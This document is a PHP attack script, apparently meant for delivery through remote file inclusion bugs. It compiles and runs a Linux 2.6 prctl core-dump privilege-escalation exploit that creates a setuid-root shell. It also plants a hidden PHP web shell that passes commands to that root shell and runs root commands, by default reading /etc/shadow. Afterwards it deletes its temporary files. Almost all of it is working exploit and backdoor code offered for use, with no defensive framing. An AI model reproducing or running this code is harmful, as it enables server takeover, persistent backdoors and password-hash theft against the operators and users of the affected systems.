PHP KERNEL EXPLOITER

<?php 
/*

Kernel Exploiter for use in RFI bugs.

*/
set_time_limit(0);
if(isset($_POST['exploit_it'])) {
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
if($_POST['compiler'] == "none") {
echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>';
end;
}
$cc = $_POST['compiler'];
$prctl = '#!/bin/sh

cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";

int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void)
{
setgid(0);
setuid(0);
if (getuid() == 0) {
printf("\n[+] We have root!\n\n" );
system("/bin/sh");
system("$_POST[cmd]");
';
if(!stristr($_POST['shell'],"could not be found")) {
$prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");';
}
$prctl .= 'system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/core*");
system("exit");
} else {
printf("\n[-] Failed.\n\n" );
system("rm -rf '.$_ENV["TMPDIR"].'/s");
}
return 0;
}
__EOF__
';

$phpwrapper = '<?php
if(isset($_GET[cmd])) {
echo "<pre>";
echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\"");
echo "</pre>";
}
?>';
echo "<pre><div align='center'>";
$h = fopen("/tmp/a.sh", "w");
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit....
";
echo passthru("sh /tmp/a.sh");
echo passthru("$cc -o /tmp/s /tmp/s.c");
echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c");
echo "Running exploit...waiting about 4 minutes to see if exploit worked
";
echo passthru("/tmp/getsuid");
echo passthru("/tmp/s");
echo "Cleaning up
";
echo passthru("rm -rf /tmp/getsuid*");
echo passthru("rm -rf /tmp/s.c");
echo passthru("rm -rf /tmp/a.sh");
echo "Done!

</div>
</pre>";

} else {
echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname();
}
} else {

?>
<div align="center">
<h4>PHP Attack Script</h4>
<h5><?php echo php_uname(); ?></h5>
<pre><div align="center">
Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?>
Checking for cc or gcc............<?php
$path = explode(":",$_ENV["PATH"]);
$gotcc = FALSE;
$gotgcc = FALSE;
foreach($path as $dir) {
if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) {
$gotcc = TRUE;
$pathtocc = $dir."/cc";
echo '[ <font color="#00CC00">OK</font> ]'."\n";
break;
} elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) {
$gotgcc = TRUE;
$pathtogcc = $dir."/gcc";
echo '[ <font color="#00CC00">OK</font> ]'."\n";
break;
}
}
if($gotcc == FALSE && $gotgcc == FALSE) {
echo '[ <font color="#FF0000">Failed</font> ]'."\n";
}
?>
Checking for execute permissions..<?php
$h = fopen("/tmp/test.sh","w");
fwrite($h,"#!/bin/sh");
fclose($h);
system("sh /tmp/test.sh",$returnval);
if($returnval == 0) {
echo '[ <font color="#00CC00">OK</font> ]'."\n";
} else {
echo '[ <font color="#FF0000">Failed</font> ]'."\n";
}
passthru("rm -rf /tmp/test.sh");
?>
</pre></div>

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table border="0" cellspacing="0">
<tr>
<td><div align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Prctl 2.6.x exploit</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">Location and name for root shell:</div></td>
<td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td>
</tr>
<tr>
<td><div align="right">Location and name for php shell wrapper: </div></td>
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td>
</tr>
<tr>
<td><div align="right">Commands to perform while root
seperate multiple commands with ; : </div></td>
<td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td>
</tr>
</table>
</div>
<div align="center">
<input type="hidden" name="compiler" value="<?php
if(isset($pathtocc)) {
echo $pathtocc;
} elseif(isset($pathtogcc)) {
echo $pathtogcc;
} else {
echo 'none';
}
?>" />
<input type="hidden" name="exploit_it" value="doit" />
<input name="submit" type="submit" value="Submit" />

After pressing submit it may take up to 4 minutes for the page to load depending
on exploit.

This is due to the exploit being run.

If exploit fails the system may be patched or kernel may not be vuln.
</div>
</form>
<?php } ?>
